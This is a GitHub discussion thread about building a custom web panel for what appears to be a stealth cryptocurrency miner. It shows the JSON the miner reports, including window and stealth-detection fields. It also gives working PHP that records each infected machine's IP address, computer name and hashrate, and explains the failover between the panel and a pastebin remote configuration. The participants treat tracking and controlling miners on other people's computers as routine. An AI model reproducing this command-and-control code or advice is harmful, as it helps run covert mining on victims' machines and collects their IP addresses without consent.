### DISCUSSION TITLE
third party web panel

### DISCUSSION THREAD

**Discussion by 0xSteff** [UnamSanctam/UnamWebPanel#407] [Q&A]
I wanted to ask if I could make my own web panel? Essentially, there is some kind of message format in which the miner sends data along the route. Just the only thing I need is to track the name, hashrate and ip. I would like to use pastebin with Ipgrabber for this, but the remote configuration method has too much time before updating.

**Comment by alcinzal** [comment]
The miner sends information in the form of JSON, like this (example, not all of these are always filled out, or in this format):
```
{
  "computername": "example_computer",
  "cpu": "Intel i7",
  "type": "ethminer",
  "id": "1234",
  "hashrate": 50.5,
  "status": "active",
  "username": "user1",
  "pool": "pool.com",
  "port": "3333",
  "algo": "etchash",
  "password": "pass123",
  "user": "user1",
  "worker": "worker1",
  "gpu": "NVIDIA GTX 1080",
  "activewindow": "Chrome",
  "runtime": "3600",
  "version": "1.0.0",
  "stealthfound": "false",
  "remoteconfig": "http://example.com/config",
  "extradata": "none"
}
```

If you want to create your own custom panel that only captures ip, computername and hashrate, and saves it to a JSON file, you could make a php file like this:

```
<?php
$data = json_decode(file_get_contents('php://input'), true);

function getData($key){
    global $data;
    return htmlspecialchars($data[$key] ?? '', ENT_QUOTES, 'UTF-8', false);
}

$clientIp = $_SERVER['REMOTE_ADDR'];
$computername = getData('computername');
$hashrate = round(is_numeric(getData('hashrate')) ? getData('hashrate') : 0.0, 2);

$fields = [
    'computername' => $computername,
    'hashrate' => $hashrate
];

$filePath = 'data.json';

// If file already exists, read from it.
if (file_exists($filePath)) {
    $jsonData = json_decode(file_get_contents($filePath), true);
} else {
    $jsonData = [];
}

$jsonData[$clientIp] = $fields;

file_put_contents($filePath, json_encode($jsonData, JSON_PRETTY_PRINT));
```

Now if you put this php file on a server, and link it in the miner builder, every time someone connects to it through the miner, it will store it in "data.json" with the following structure:
```
{
    "123.45.67.89": {
        "computername": "example_computer1",
        "hashrate": 75.5
    },
    "987.65.43.21": {
        "computername": "example_computer2",
        "hashrate": 50.3
    }
}
```

However I would highly recommend using a database like sqlite to store the information, as it is more stable, I have had bugs with JSON where suddenly all my data disappears.

You should also store the algorithm used, so CPU and GPU miners don't get mixed, if you are thinking of mining different coins.

**Comment by 0xSteff** [comment]
Can I use both the remote configuration and the web panel at the same time? I was just thinking of uploading the configuration to the pastebin and raising the panel only when I need to and viewing the ip list

**Reply by alcinzal** [reply]
I do believe so yes. If the miner tries to connect to the web panel, but is unable to, it will read the remote configuration instead. But when you bring the web panel online, the miner will connect to that instead and you can view the ip list and how many is mining.

**Reply by UnamSanctam** [reply]
You can use both at the same time, it will always check both the web panel and "Remote Configuration" but web panel settings take priority over the "Remote Configuration".
